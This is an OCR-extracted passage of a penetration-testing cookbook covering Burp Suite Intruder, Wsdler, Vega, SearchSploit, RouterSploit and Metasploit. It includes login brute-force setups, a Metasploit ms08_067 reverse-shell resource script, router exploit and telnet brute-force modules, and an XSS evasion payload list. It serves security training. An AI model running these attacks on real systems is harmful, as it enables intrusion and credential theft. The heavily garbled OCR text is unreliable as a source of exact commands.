Scan item 4 | 5 issues | 42% complete | http://testphp.vulnweb.com/listproducts.php 


Gesu ase request | tse response 







abandoned ~ too many error... 


i Email addresses disclosed 
j Frameable response (potential Clickjacking) 

















Intel Mac OS X 10.12; rv ) Gecko/20100101 irefox/7.0.1 
scept: t ication/xhtml+xml,application/xml; 9, *;q=0.8 
Accept-Language: en-us,en;q=0.5 
Accept-Encoding: 
Accept-Charset: oT, *7q=0.7 
. ittp://testphp.vulnweb.com/categories.php 








While we are using only a few extensions here, you can view the whole list and choose 
your own extensions too. Extensions are easy to set up. 


Exploiting WSDLs with Wsdler 


Web Services Description Language (WSDL) is an XML-based language used to describe the 
functionality offered by a web service. Often while executing a pentest project, we may find a WSDL file 
out in the open, unauthenticated. In this recipe, we will look at how we can benefit from WSDL. 


How to do it... 


We intercept the request of WSDL in Burp: 


1. Right-click on the request and select Parse WSDL: 





Send to Spider 


GET /ReceiverService.svc?wsdl HTTP/1 : 

Rast: Do an active scan 

User-Agent: Mozilla/5.0 (Macintosh; Send to Intruder Gecko/2010010: 
Accept: text/html,application/xhtml+ Send to Repeater 0.8 


Accept-Language: en-us,en;q=0.5 


Send to Sequencer 
Send to Comparer 
Connection: close Send to Decoder 
Request in browser 
Parse WSDL 


Accept-Encoding: gzip, deflate 


Accept-Charset: 150-8859-1, utf-8; q=0 








2. Switch to the Wsdler tab, and we will see all the service calls. We can see the complete request by 
clicking on any one of them: 


| Receiverservice x | ————— 








Operation | Binding 

Insert BasicHttpBinding_IReceiverService 
Update BasicHttpBinding_IReceiverService 
GetStatus BasichttpBinding_IReceiverService 
SetStatus BasicHttpBinding_IReceiverService 
SetPrimaryKey BasicHttpBinding_IReceiverService 
GetPrimaryKey BasicHttpBinding_IReceiverService 
SetTableName BasicHttpBinding_IReceiverService 
GetTableName BasicHttpBinding_IReceiverService 











— Raw Hex 


3. To be able to play around with it, we will need to send it to the Repeater: 


a 








Operation Binding 

Insert BasicHttpBinding_IReceiverService 
Update BasicHttpBinding_IReceiverService 

Getta aasichirtpginding (Receiverservice 

SetStatus BasicHttpBinding_IReceiverService 
SetPrimaryKey BasicHttpBinding_IReceiverService 
GetPrimaryKey BasicHttpBinding_IReceiverService 
SetTableName BasicHttpBinding_IReceiverService 
GetTableName BasicHttpBinding_IReceiverService 











Wie 
[ Raw [Params | Headers | Hex | xmu | 


POST /ReceiverService.svc HTTP/1.1 















User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv: -1) Gecko/20100101 Firefox/7.0.1 
Accept: text/html,application/xhtml+xml, application/xmljq=0.9,*/*;q=0.8 

Accept-Language: en-us, en;qg=0.5 

Accept-Encoding: gzip, deflate 

Accept-Charset: 150-8859-1,utf-8;q=0.7, *;q=0.7 

Connection: close 

SOAPActio http tempuri.org/IReceiverService/GetStatus 

Content-Type: text/xml;charset=UTF-8 

Host: 

Content-Length: 209 

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> 


<soapenv: Header/> 
<soapenv: Body>| 
<tem:GetStatus/> 
</soapenv:Body> 
/soapenv:Envelope> 





4. We right-click and select Send to Repeater: 


POST /ReceiverService.svc HTTP/1.1 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12 
Accept: text/html, application/xhtml+xml, application/xml; 
Accept-Language: en-us,en;qg=0.5 
Accept-Encoding: gzip, deflate 
Accept-Charset: 150-8859-1,utf-8;q=0.7,*;q 











Connection: close Send to Spider 
SOAPAction: http://tempuri.org/IReceiverSe] Doan active scan 
Content-Type: text/xml; charset=UTF-8 Send to Intruder 
Host: ‘ : 
Content-Length: 209 send to Repeates 
Send to Sequencer 
<soapenv:Envelope xmlns:soapenv="http://scl Send to Comparer ae | 
<soapenv: Header/> Send to Decoder 
SEDEpOR MADDY Request in browser > 
<tem:GetStatus/> 
</soapenv:Body> Parse WSDL 
</soapenv:Envelope> Engagement tools > 





5. In our case, we can see that putting a single quote throws up an error. And voila! We have an SQL 
injection possibility! 





on/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 


tp: schemas.xmlsoap.org ap/envel 


The following screenshot shows the SQL injection: 


:EnVELOpE 
xmlns:s="http: schemas.xmlsoap.org/soap/envelope/"><s:Body><s: Fault 
xmins:a="http: schemas.microsoft.com/net/2005/12/window: mmunicat 
r“>a:InternalServiceFault</fauit de><faultstring 
xml:lang=“en-US">Unterminated string. Expected delimiter: '. Path ' 
position 1.</faultstring><detail><Except f t 
xmlins="http: schemas. 





patcn 


Q 
ioe 

5 
fu 
ot 
w 
? 

? 

4 
rt 


xmins:i="http: www.w3.org/2001/XMLSchema-instance”><KelpLink 


You will learn more about exploiting SQL in the later chapters of the book. 


posh; Intel Mac OS X 10.12; rv:7.0.1) Gecko 


Using Intruder 


Intruder is a great tool which allows us to perform different types of attacks that can be used to find all 
kinds of vulnerabilities. Some of the most common attacks that can be performed with Intruder are as 
follows: 


Bruteforce 

Fuzzing 

Enumeration 
Application layer DoS 


How to do it... 


We start off picking up a request from our captured requests: 


1. Right-click on the request and select Send to Intruder: 


















Contents 

Host | Method | URL | Params | Statu 
http://demo.testfire.net GET /bank/login.aspx Oo 200 «a 
rw 

http://demo.testfire.net GET / O 
http://demo.testfire.net GET /cgi.exe O 
http://demo.testfire.net GET {default.aspx O 
http://demo.testfire.net GET /default.aspx?content... CA} 
http://demo.testfire.net GET /default.aspx?content... ed} 
http://demo.testfire.net GET /default.aspx?content... ed} 
http://demo.testfire.net GET /default.aspx?content... J 
http://demo.testfire.net GET /default.aspx?content... Ci} 
http://demo.testfire.net GET /default.aspx?content... J oa 


















Send to Spider 
Do an active scan 
Do a passive scan 











Send to Intruder ++! 










Accept-Encoding: Send to Repeater 
Send to Sequencer 

Send to Comparer 

Send to Decoder 

Show response in browser 


Request in browser > 









h 


Accept-Charset: I50-% 


Referer: http:// 






h 


Cookie: ASP.NET S 
Content-Type: applic: 
Content-Length: 37 
TORRES Blows Engagement tools > 
Copy URL 


Copy as curl command 





uid=admin&passw=widft 


2. Switch to the Intruder tab. We need to specify a payload position, and we can do that by selecting the 
place we want or selecting the payload and clicking on the Add 8 button: 





a 
Target [Postings | Pavlos | onvons | 











| (2) Payload Positions Start attack 
Configure the positions where payloads will be inserted into the base request. The attack type determines the way in 
which payloads are assigned to payload positions ~ see help for full details. 
Attack type: | Sniper is} 
Add§ 
 Clear§ 
Auto § 
} Refresh 
aa | fee] [ud] L> J Type a search term 0 matches eeaGiéduee 
1 payload position Length: 600 








3. In our case, since we are performing a login brute force, we will use the attack type Pitchfork: 


"4 Battering ram 


Pitchfork 
Cluster bomb 





4. Next, we switch to the Payloads tab. This is where we will enter our payloads: 


(Faroet | Postions | Pavoads 


(2) Payload Sets 








You can define one or more payload sets. The number of payload sets depends on the 
Positions tab. Various payload types are available for each payload set, and each paylc 
different ways. 





Payload set: 1 7 Payload count: 0 


Payload type: | Simple list y| Request count: 0 





5. We choose set 1, and as we are bruteforcing, we can choose a simple list as the Payload type. 
6. Inthe Payload options, we specify the list of words we want the app to be tested against. We can 
either enter them manually, or we can choose a pre-built list: 


(2) Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as payli 


Paste [admin 


administrator 
Load ... admin1 
roger 
james > 
packt 

















(aad) [I | 








Add from list ... |v 


7. Now we choose set 2 and again specify a list of passwords we want the tool to try: 




















(2) Payload Options [Simple list] 
This payload type lets you configure a simple list of strings that are used as payli 
Paste | | admin > 
——————~_ | administrator 
Load ... admin1 
roger 
Remove James > 
—_—_—— | packt 
Clear 
Add | 
Add from list ... J 











8. Burp allows us to customize the attack with the option of configuring stuff such as the Number of 


threads, choosing Redirections options, and even a Grep - Match in the Options tab: 





Target | Positions | Payloads 





Ly Se Serra or Set VIS S Se ST eae 





OC) Store full payloads 


"| 


Grep - Match 


These settings can be used to flag result items containing specified expressions. 


G) 


© Flag result items with responses matching these expressions: 


Paste erhor a 























exception 

Load ... illegal 
invalid 

Remove | | fail > 
stack 

= — ) ‘| access 
directory 
file q 
_not- found 
Add Enter a new item 





Match type: @ Simple string 
O Regex 


© Case sensitive match 
@ Exclude HTTP headers 


9. We click on Start attack: 





Results — Target | Positions | Payloads | Options 


Filter: Showing all items | (2) 





‘Request «| Payload ‘| Payload2 {Status | Error | Timeout | Length | Comment 
0 200 BG BG 9876 
1 admin password 200 G Go 9876 
2 administrator password@123 200 Oo G 9884 
4 roger admin@123 200 2 oO 9876 








bid=adminlépassw=a 


btnSubmit=Login 


v 


2 < . - sh : Type a search term 0 matches 


Finished ee 








10. Anew window will pop up, showing all the results of the attack performed. 


Here, we have used only one type of attack mode (Pitchfork). More can be learned about 
the different types of attack modes for Intruder at https:/itstorm.github.io/blog/burp-suite-intruder-a 
ttack-types/. 


Web app pentest with Vega 


Vega is an open source web app pentesting tool built in to Java. It has a JavaScript-based API, which 
makes it even more powerful and flexible. Vega is pretty easy to use in the following recipe, and you will 
learn how to perform a scan with it. 


Getting ready 


Some Kali versions do not come with Vega installed, but it can be installed using the command: 


| apt-get install vega 


How to do it... 


1. Vega is inbuilt in Kali and can be started using this command: 


| vega 
The preceding command opens up the Vega tool: 


Subgraph Vega = o x 


File Scan Window Help 


@ 0 & 


oo @ Scan Info 


O Scanner & Proxy 
@ VEGA 





© Scan Alerts ai 
Scan Alert Summary 
@oOere 
3) 
(3) 
42 Identities 8 SNe 


2. There are two ways to start a scan in Vega—by choosing either the scanner mode or the proxy mode. 
We look at the scanner mode here. 


3. We choose the Start New Scan options from the Scan menu: 


File Scan Window Help 


Start New Scan Ctri+N 


+ 


zo Edit Target Scope Ctri+E | 
@A\Waheite Minwsl = ll Ia Scan Infa 





4. Inthe window, we enter the website URL and click on Next: 


Select a Scan Target 


Choose a target for new & VEGA 


scan 


Scan Target 


(*) Enter a base URI for scan: 





testphp.vulnweb.com/| 





~ Choose a target scope for scan 


Default 


m 
= 





Web Model 


Y Include previously discovered paths from Web model 








aC Next > Cancel Finish 


5. Then, we can choose the modules we want to run: 


Select modules to run: 

ea] Injection Modules 

(¥ Bash Environment Variable Blind OS Injection (CVE-2014-6271, 
\ HTTP Trace Probes 

LJ Format String Injection Checks 

Cross Domain Policy Auditor 
‘i XML Injection checks | 


‘ Eval Code Injection 








6. In this step, we can enter the cookies: 


Authentication Options 


Configure cookies and authentication @ VEGA 


identity to use during scan 


Identity to scan site as: 


Set-Cookie or Set-Cookie2 value: 


Add cookie 


Remove selected cookie(s) 


7. Next, we specify whether we want to exclude any parameters and then we click on Finish: 





=o @ Scan Info 



























im} 
he o> @AHE 
a @ testphp.vulnweb.com [ 
a. VEGA 
+ e a 
© Scan Alerts =A Scanner Progress 
@oenfea 
http://testphp.vulnweb.com/cart.php 
3 out of 76 scanned (3.9%) 
at Identities at 370A 











8. We can see the results and vulnerabilities in the left-hand side pane: 

















Oe8SE 


& © 12/31/2016 22:59:46 [A 


-@ http://testphp.vulnweb 
4) @High (11) 
+) @ Medium (5) 
+) @ Low (2) 
+) @ Info (17) 


les 


9. Clicking on an alert shows us the details: 


> AT A GLANCE 


Classification 
Resource 
Parameter 


Method 
Risk 


> REQUEST 


Input Validation Error 
/comment.php 

name 

POST 





POST /comment.php [name~-->">'>'" comment~-vega Submit~Submit phpaction~echo $ POST[comment]; ] 


> DISCUSSION 
Cross-site scripting (XSS) is a class of vulnerabilities affecting web applications that can result in security controls implemented in browsers 


being circumvented. When a browser visits a page on a website, script code originating in the website domain can access and manipulate 
the DOM (document object model), a representation of 


visiting the same website. This would circumvent the browser same-origin policy because the browser has no way to distinguish authentic 


10. Similar to Burp, Vega also has proxy feature, where we can intercept and analyze the requests 
manually too! 


11, 


We can edit and replay the requests to perform a manual check: 


B Website View 


SP Intercept > Proxy Status 








heed @a 





“@ testphp.vulnweb.com 
= /AJAX 
/GET 


a) -php 

XX) artists.php 

[| categories.php 
index.php 


showxml.php 











styles.css 








[X) titles. php 

+ [ /Flash 

cs /bj/var/www 

* (2 simages 

+ [2 /Mod_Rewrite_Shop 


Inant InlAfin 









Method Request 


jo 

Request | Response | 

> GET /AJAX/ HTTP/1.1| 
Accept-Encoding: gzip,deflate 
Host: testphp.vulnweb.com 


Connection: Keep-Alive 
User-Agent: UserAgent 














Exploring SearchSploit 


SearchSploit is a command-line tool that allows us to search and browse all the exploits available at 
exploitdb. 


How to do it... 


1. To view help, we type the following command: 


| searchsploit -h 


The following screenshot shows the output of the preceding command: 


:~# searchsploit -h 
e: searchsploit [options] terml [term2] ... [termN] 
e: 


Perform aca sitive search (Default is insensitive). 
Show this help 
Search just the 


Verbose output. Title lines are allowed to overflow their colum 
Show URLs to Exploit-DB.com rather than local path. 


--colour able colour highlighting. 
--id play EDB-ID value rather than local path. 





2. We can perform a search by simply entering the keyword, and if want to copy the exploit into our 
working directory, we use this: 


| searchsploit -m exploitdb-id 


The following screenshot is an example of the preceding command: 


< 


(7D11) 





Exploiting routers with RouterSploit 


RouterSploit is a router exploitation framework that is designed especially for embedded devices. It 
consists of three main modules: 


© exploits: This contains a list of all the publically available exploits 
© creds: This is used for testing logins for different devices 
© scanners: This is used for checking a particular exploit against a particular device 


Getting ready 


Before we begin, we will have to install RouterSploit in Kali; unfortunately, it does not come with the 
official installation of the OS. RouterSploit installation is very simple, just like we installed some tools in 
the beginning of the book. 


How to do it... 


1. We use the following command to clone the GitHub repository: 
git clone https://github.com/reverse-shell/routersploit 


| 
2. We go to the directory using the ca routersp1oit command and run the file as follows: 


| ./rsf.py 


The following screenshot shows the output of step 1: 


root@kali: ~ 
github.com/reverse-shell/routersploit 


:~# git clone https:// 
Cloning into ‘routersploit'. 
remote: Counting objects: 2972 
remote: Total 2972 (delta Q), 


, done. 
a 
Receiving objects: 100% (2972/29 


used 
Fr 


= 


2), 





3. To run an exploit against a router, we simply type this: 


| use exploits/routername/exploitname 
The following screenshot shows an example of the preceding command: 


use exploits/dlink/dcs_ 9301_auth_rce 
hh 





4. Now we see the options that are available for the exploit we chose. We use the following command 


| show options 


The following screenshot shows the output of the preceding command: 


rst ( ) > show options 
k-lme[-1amme)e)mkelal—n 

Name Current settings Description 
target 
port 


Module options: 
Name 


Oo log in with 
0 log in with 





5. We set the target with the following command: 


set target 192.168.1.1 


The following screenshot shows the output of the preceding command: 





6. To exploit, we simply type exploit OF run: 


eS run 


Running module... 





Exploit failed - target seems to be not vulnerable 


Using the scanners command 


The following steps demonstrate the use of scanners: 


1. Toscana Cisco router, we use the following command: 


| use scanners/cisco_scan 


2. We now check for other options: 


| show options 


The following screenshot shows the output of the preceding command: 


) > show [o) oho) ar) 


Ii |ae(-1amme)e)m Re) a 
Name Current settings septate eta 
taroet E é ress e.g. 192.168.1.1 
jelelme 
Module options: 
Name Current settings 


igala-t-le |) 


rsf ( 





3. To runa scan against a target, we first set the target: 


| set target x.x.x.x 


The following screenshot shows the output of the preceding command: 





4. Now we runit, and it will show all the exploits that the router is vulnerable to: 


n > run 


page multi_path_traversal is not vulnerable 
c / path traversal is not vulnerable 
disclosure is not vulnerable 
is not vulnerable 
re is not vulnerable 
econds 


vulnerable to any exploits! 





Using creds 


This can be used to test default password combinations on the services via the dictionary attack: 
1. We use the creds command to run the dictionary attack on various services: 


| use creds/telnet_bruteforce 


The following screenshot shows the output of the preceding command: 


root@kali: ~/routersploit 


) > use creds/telnet_bruteforce_ 





2. Next, we look at the options: 


| show options 


The following screenshot shows the output of the preceding command: 


) > show options 


Target options: 
Name Current settings 


get IP address or file with target:port (file://) 
get port 





3. Now we set the target IP: 


| set target x.x.x.x 


4. We let it run, and it will show us any login it finds. 


d is starting... 
thread is starting... 


» thread is starting... 


is starting... 
is starting... 
) thread is starting... 
5 thread is starting... 
7 thread is starting... 





Using Metasploit 


Metasploit is the most widely used open source tool for pentesting. It was first developed by HD Moore 
in 2001 in Perl; later, it was completely rewritten in Ruby and then it was acquired by Rapid7. 


Metasploit contains a collection of exploits, payloads, and encoders, which can be used to identify and 
exploit vulnerabilities during a pentest project. In this chapter, we will cover a few recipes that will 
enable the use of the Metasploit Framework (MSF) more efficiently. 


How to do it... 


The following steps demonstrate the use of MSF: 


1. Start the MSF by typing the following command: 


| msfconsole 


The following screenshot shows the output of the preceding command: 


:~# msfconsole 


HHHBHHRH 
HEHHRHHHHHRHRAHEA 
HEBHHHHRAHHHHBA RHA RARE 
HHHLBHHEBHEBHEAHBHEAHERHERE 
HEBHHHHHHHHHHBHHHA AHA HBAS 
HHHEBHHBHERHERHRAHAH EHR SERRE 
HHHHHHHHRHHRAHHARHARHARAHRAERAE 
HHAHHHHAARAHEAARAHHARHARAHRAAHH 
HBAHBHHRHERARAABARRABAHBAHEAEE 

# HHHHHHHE # 

HHEH #H 

HEE HHH 

HERE HH 

RHEE HHHBHHBHER HHHE 
HHHHHHHHHBHRAHEHRHABAAE HHH 
HRHAHHHBHHRHHRHH RHR EH HAHE 

HHHBHHBHHAHHAHAAHH =H 


HHHHHHHHHHHH 
HRHBAHEH 
HHHHRHHRH 
HHHHHHRAH EHH 


## 
HHH 
HHHHH 
HHEHHH 


HHRHHHHE HHRHRHHRH 
HHHHH SHEE 
HHH HHHHRAHHH 
HHHHHH HHRHHHHHRAHH 
PHHEHHHHHRHHHHRAH RAH 
ba # HHE # # ## 
HHHEHHHHHHHHHHHHEBABHH BH 
## HH ## ## 
/metasploit .com 


Tired of typing 
Learn more on http:, 


2. To search for an exploit, we type this: 


| search exploit_name 


The following screenshot shows the output of the preceding command: 


ate lalss 


expLoit/windows/smb/ms08 067 netapi 2008-10-28 folm=toe 
Server Service Relative Path Stack Corruption 





3. To use an exploit, we type this: 





Description 


10. 





use exploits/path/to/exploit 


The following screenshot shows the output of the preceding command: 


| buvLUWwnau. 


/ netapi _ 





Next, we look at the options by typing the following: 


show options 


Here, we will need to set the payload, target IP, localhost, and port we want for the back connection. 
We set the target using the following: 


set RHOST x.x.xX.x 


. We set the payload with this: 


set payload windows/meterpreter/reverse_tcp 


Next, we set the ihost and 1port in which we want the connection: 


set lhost x.x.x.x 
set lport 4444 


Now we run the exploit command: 


exploit 


Once it's successfully exploited, we will look at a meterpreter Session: 


File Edit View Search Terminal Help 





Although we used only Windows reverse_tcp here, Metasploit has a lot of other payloads 
depending on the backend OS or web application used. A complete list of payloads can be 
found at https://www.offensive-security.com/metasploit-unleashed/msfpayload/. 


Automating Metasploit 


Metasploit supports automation in different ways. One such way we will cover here is resource script. 


A resource script is basically a set of commands that run automatically when a script is loaded. 
Metasploit already contains a set of prebuilt scripts that prove to be most useful in a corporate pentesting 
environment. The complete list of scripts available can be seen in the /usr/share/metasp1oit - 
framework/scripts/resource directory: 


Loit-framework/sc t rce# ls 
bap_ firefox gle oracle _login.rc 
bap_flas : fe) calls Eiatels 
bap_ie only.rc (o} of - [oman |e 
oe) basic_discovery.rc port_cleaner.rc 
auto pass the_hash.rc fileformat_generator.rc portscan.rc 


auto _win32_multihandler.rc mssql_brute.rc run_all_post.rc 
bap_all.rc multi_post.rc wmap_autotest.rc 
bap_dryrun_only.rc nessus_vulns_clea 

isr/shar taspLoit-framework/scripts/resource# 





How to do it... 


The following steps demonstrate the automation of Metasploit: 


1. We start Metasploit using the following command: 


| msfconsole 


The preceding command's output is shown in the following screenshot: 


:~# msfconsole 


HARHHAEHE 
HHABHHARHHAHHHA EHH 
HEHHHEHHARHAAHHHABHAAE 
HEBHEHHEHHAEEHARHARERABHRS 
HHEHHHHHHHHHAHHHAPHHABHHA BREE 
HERHHBHRARHHARHHAERAARHAARHA BE 
HEHHAAHHHEHRARHHABHHARHAA RAR 
HABHHARHHAAHEHARHHARHAAEHHAEHARE 

HHARHHBHAARHAARHHARRHARHAREHAE 
# HRHHHHHH 
HHH 
HH HHH 
HHHH HHH 
HHH HHAHHHARHE HHH 
HHFHABEHAFHAARAAARHAA BE HHA 





2. Some scripts require rxosts to be set globally, so we set rHosts using the following command: 


| set RHOSTS 172.18.0.0/24 


The preceding command's output is shown in the following screenshot: 





3. Now we run the script using the following command: 


resource /usr/share/metasploit - framework 
/scripts/resource/basic_discovery.rc 


4. This script will do a basic host discovery scan on the subnet provided: 


e/metasploit - framework/scripts/resou sic_discovery. 


re/metasploit - fram scripts/resour ic discov 


metaspLloit -framework/scripts/resource sic_discovery.r 


iliary module running as backgroun 
oom aliit=)® 
ng Nmap with the following options: -n -PN -PO 





Writing a custom resource script 


In the following recipe, we will look at how to write a basic script. 


How to do it... 


Follow the given steps for writing a basic script: 


1. We open up any editor—nano, 1eafpad, and so on. 
2. Here, we type all the commands we would want MSF to execute: 


use exploit/windows/smb/ms08_067_netapi 

set payload windows/meterpreter/reverse_tcp 
set RHOST 192.168.15.15 

set LHOST 192.168.15.20 

set LPORT 4444 

exploit -j 


3. We save the script witha .rc extension: 


*(Untitled) 


File Edit Search Options Help 
use exploit/windows/smb/ms08_067_netapi 
set payload windows/meterpreter/reverse_tcp 
set RHOST 192.168.15.15 
set LHOST 192.168.15.20 
set LPORT 4444 
exploit -j 








4. Now we Start msfconsole and type the command to automatically exploit the machine: 


idol) 
)> set RHOS 2168575215 
.rc)> set LHOST 192.168.15.20 


moscript.rc)> set LPORT 4444 
=> 4444 
re root /De moscript.rc)> exploit -j 
[ runnir kground job. 





Aresource script is just one way of automating Metasploit; you can learn about other 
ways of automating Metasploit in this article at https://community.rapid7.com/community/metasploit/bl 
0g/2011/12/08/six-ways-to-automate-metasploit. 


Databases in Metasploit 


In Kali Linux, we will have to set up a database before we use the database functionality. 


How to do it... 


The following steps demonstrate the setting up of a database: 


1. First, we start the postgresql server using the following command: 


| service postgresql start 


The following screenshot shows the output of the preceding command: 


ervice postgresql start 





2. Then, we create the database and initialize it: 


| msfdb init 


3. Once this is done, we load msfconsole. Now we can create and manage workspaces in Metasploit. A 
workspace can be considered a space where we can save all out Metasploit data with 
categorizations. To set up a new workspace, we use the following command: 


| workspace -a workspacename 
The following screenshot shows the output of the preceding command: 


> workspace -a@ demopackt 


Added workspace: demopackt 
> 





4. To see all the commands related to the workspace, we can execute this: 


| workspace -h 


5. Now that we have our database and workspace set up, we can use various commands to interact with 
the database. 
6. To import an existing Nmap scan into our database, we use the following command: 


| db_import path/to/nmapfile. xml 


The following screenshot shows the output of the preceding command: 


root@kKal: ~ 


sf > db status 
[*] postgresql connected to msf3 
sf > db_import /root/Desktop/msf_ 





7. Once the import is complete, we can view the hosts using the following command: 


| hosts 


The following screenshot shows the output of the preceding command: 





8. To view only the IP address and OS type, we use the following command: 


| hosts -c address, os_flavor 


The following screenshot shows the output of the preceding command: 


Enterprise 





9. Now suppose we want to perform a TCP auxiliary scan. We can set all these hosts as rxosts for an 
auxiliary too. We do this using the following command: 


| hosts -c address,os_flavor -R 
The following screenshot shows the output of the preceding command: 


ess,os flavor -R 


alt 





10. As the rnosts have been set, they can be used across the Metasploit for any module required. 
11. Let's look at one more example where our imported Nmap scan already has all the data we need. We 
can use the following command to list all the services in the database: 


| services 


12. To see only those services that are up, we can use the -u switch: 


services - 


name 


e 11118) 
Wie!) ipmi 


mee) 
nae 


supported, 


Windows 10 (Unknown) 
IPMI-2.0 UserAuth(auth_ 


5.5.47-Oubuntu0.14.04.1 
220 VMware Authenticati 
L supported Certificate:/ 


ssl-certificates@vmware.com/CN=LocaLlhost. locals 


) bepi “http 
07181417) / JBossweb- Fe, Of) 

tcp aiaae) 

Ulele) dns 


port proto name 


1.14 443 ime ©) https 


/Pages/en-US/Default . aspx 


J. 3 7 4 4 3 tc @) www 
9.49 443 tcp https 
9.184 443 tcp www 
9.222 443 tcp https 


open Apache-Coyote/1.1 ( Pow 


open SonicWALL 
open Microsoft ONS 


iaanme) 


Microsoft-IIS/8.5 ( Pow# 


Microsoft -HTTPAPI/2.0 


Microsoft-I1S/8.0 ( Pows 





Web App Exploitation — Beyond OWASP Top 10 


In this chapter, we will cover the following recipes: 


Exploiting XSS with XSS Validator 

Injection attacks with sqimap 

Owning all .svn and .git repositories 
Winning race conditions 

Exploiting JBoss with JexBoss 

Exploiting PHP Object Injection 

Backdoors using web shells and meterpreters 


Introduction 


In the OWASP Top 10, we usually see the most common way of finding and exploiting vulnerabilities. In 
this chapter, we will cover some of the uncommon cases one might come across while hunting for bugs in 
a web application. 


Exploiting XSS with XSS Validator 


While XSS is already detected by various tools such as Burp, Acunetix, and so on, XSS Validator comes 
in handy. It is the Burp Intruder and Extender that has been designed to automatically validate XSS 
vulnerabilities. 


n-with-modsecurity-and-phantomjs.html. 


@ It is based on SpiderLabs' blog post at http://blog.spiderlabs.con/2013/02/server-site-xss-attack-detectio 


Getting ready 


To use the tool in the following recipe, we will need to have SlimerJS and PhantomJS installed on our 
machines. 


How to do it... 


The following steps demonstrate the XSS Validator: 


1. We open up Burp and switch to the Extender tab: 


WOUL Wizara 


u 
a 
oe) 





| Refresh list | | Manual install... | 





2. We then install the XSS Validator extender: 


XSS Validator 


This extension sends responses to a locally-running XSS-Detector server, powe 
Usage: 
Before starting an attack it is necessary to start the XSS-Detector servers. Navigz 


$ phantomjs xss.js & 
$ slimerjs slimer.js & 


The server will listen by default on port 8093. The server is expecting base64 en 
Burp extender. 


Navigate to the xssValidator tab, and copy the value for Grep Phrase. Enter this v 
Phrase indicate successful execution of XSS payload. 


Examples 


Within the xss-detector directory there is a folder of examples which can be use 


@ Basic-xss.php: This is the most basic example of a web application that is vi 
alerts and console logs, do not trigger false-positives. 


@ Bypass-regex.php: This demonstrates a XSS vulnerability that occurs when 


@ Dom-xss.php: A basic script that demonstrates the tools ability to inject pay 


Requires Java version 7 


Author: John Poulin 
Version: 1.3.0 


Rating: yey ye ye oir Submit rating 
Install 


3. Once the installation is done, we will see a new tab in the Burp window titled xss Validator: 


xss Validator is an intruder extender with a customizable list of payloads, that couples 
with the Phantom.js and Slimer.js scriptable browsers to provide validation 
of cross-site scripting vulnerabilities. 


xssValidator Getting started: 
Created By: John Poulin (@forced-request) @ Download latest version of xss-detectors from the git repository 
Version: 1.3.0 @ Start the phantom server: phantomjs xss.js 


@ Create a new intruder tab, select Extension-generated payload. 
@ Under the intruder options tab, add the Grep Phrase to the Grep-Match panel 
@ Successful attacks will be denoted by presence of the Grep Phrase 


4. Next, we install PhantomJS and SlimerJS; this can be done on Kali with a few simple commands. 
5. We download both the PhantomJS file from the internet using wget: 


sudo wget https://bitbucket.org/ariya/phantomjs/downloads/ 
phantomjs-1.9.8-1linux-x86_64.tar.bz2 


6. We extract it using the following command: 


| tar jxvf phantomjs-1.9.8-linux-x86_64.tar.bz2 


The following screenshot shows the folder in which the preceding command downloads the 
PhantomJS file: 


:/usr/local/share/phamtomjs# 1s 
bin ChangeLog LICENSE.BSD README.md third-party.txt 


wAt-igat L/share/phamtomjs# cd bin/ 


nt mj s/bin# 1s 





7. Now we can browse the folder using ca, and the easiest way is to copy the PhantomJS executable to 


/usr/bin: 


| cp phantomjs /usr/local/bin 
The following screenshot shows the output of the preceding command: 


‘bin# cp phantomjs /usr/local/bin/ 





bin# phantomjs -v 


8. To verify that we can type the phantomjs -v command in the Terminal and it will show us the version. 
9. Similarly, to install SlimerJS we download it from the official website: 
http://slimerjs.org/download.html. 
10. We first install the dependencies using the following command: 


| sudo apt-get install libc6 libstdc++6 libgcc1 xvfb 


11. Now we extract the files using this: 
| tar jxvf slimerjs-0.8.4-linux-x86_64.tar.bz2 
12. We then browse the directory and simply copy the SlimerJS executable to /usr/1ocal/bin: 


:/usr/Local/share/slimerjs-0.10.2# ls 
application.ini LICENSE README.md slimerjs.bat vendors 





chrome omni.ja slimerjs slimerjs.py 


13. Then, we execute the following command: 


| cp slimerjs /usr/local/bin/ 


The following screenshot shows the output of the preceding command: 





-js-0.10.2# cp slimerjs /usr/local/bin/ 


14. Now we need to navigate to the XSS Validator folder. 
15. We then need to start the PhantomJS and SlimerJS server using the following commands: 


| phantomjs xss.js & 


| slimerjs slimer.js & 


16. Once the servers are running, we head back to the Burp window. In the XSS Validator tab on the 
right-hand side, we will see a list of payloads the extender will test on the request. We can manually 
enter our own payloads as well: 


Payloads 
Custom Payloads can be defined here, seperated by linebreaks. 


@ {JAVASCRIPT} placeholders define the location of the Javascript function. 
@ {EVENTHANDLER} placeholders define location of Javascript events, 
such as onmouseover, that are tested via scriptable browsers. 





<script>{JAVASCRIPT}</script> 4 
<scr ipt>{JAVASCRIPT}</scr ipt> 

“> <script>{JAVASCRIPT}</script> 

“> <script>{JAVASCRIPT}</script> <” 

‘> <script>{JAVASCRIPT}</script> 

"> <script>{JAVASCRIPT}</script> <' 

<SCRIPT>{JAVASCRIPT}; </SCRIPT> 
<scri<script>pt>{JAVASCRIPT};</scr</script>ipt> 
<SCRi<script>PT>{JAVASCRIPT};</SCR</script>IPT> 
<scri<scr<script>ipt>pt>{JAVASCRIPT};</scr</sc</script>ript>ipt> 
“{JAVASCRIPT};~ 

*{JAVASCRIPT};’ 

JAVASCRIPT}; 

<SCR%OOIPT> {JAVASCRIPT} < /SCR%OOIPT> 

\"UAVASCRIPT};/ / 

<STYLE TYPE="text/javascript">{JAVASCRIPT}; </STYLE> 
<<SCRIPT>{JAVASCRIPT}/ /< </SCRIPT> 
“{EVENTHANDLER}=JAVASCRIPT} 

<<SCRIPT>{JAVASCRIPT}/ /<</SCRIPT> 

<img src="1" onerror="{JAVASCRIPT}"> 

<img src='L' onerror="{JAVASCRIPT}' 

onerror="{JAVASCRIPT}” 

onerror="{JAVASCRIPT}' 

onload="{JAVASCRIPT}" 

onload="{JAVASCRIPT}' 

<IMG ““> <SCRIPT>{JAVASCRIPT}</SCRIPT>"> 

<IMG "> <SCRIPT>{JAVASCRIPT}</SCRIPT>'> 

"> <SCRIPT>{JAVASCRIPT} 

"> <SCRIPT>{JAVASCRIPT}' 

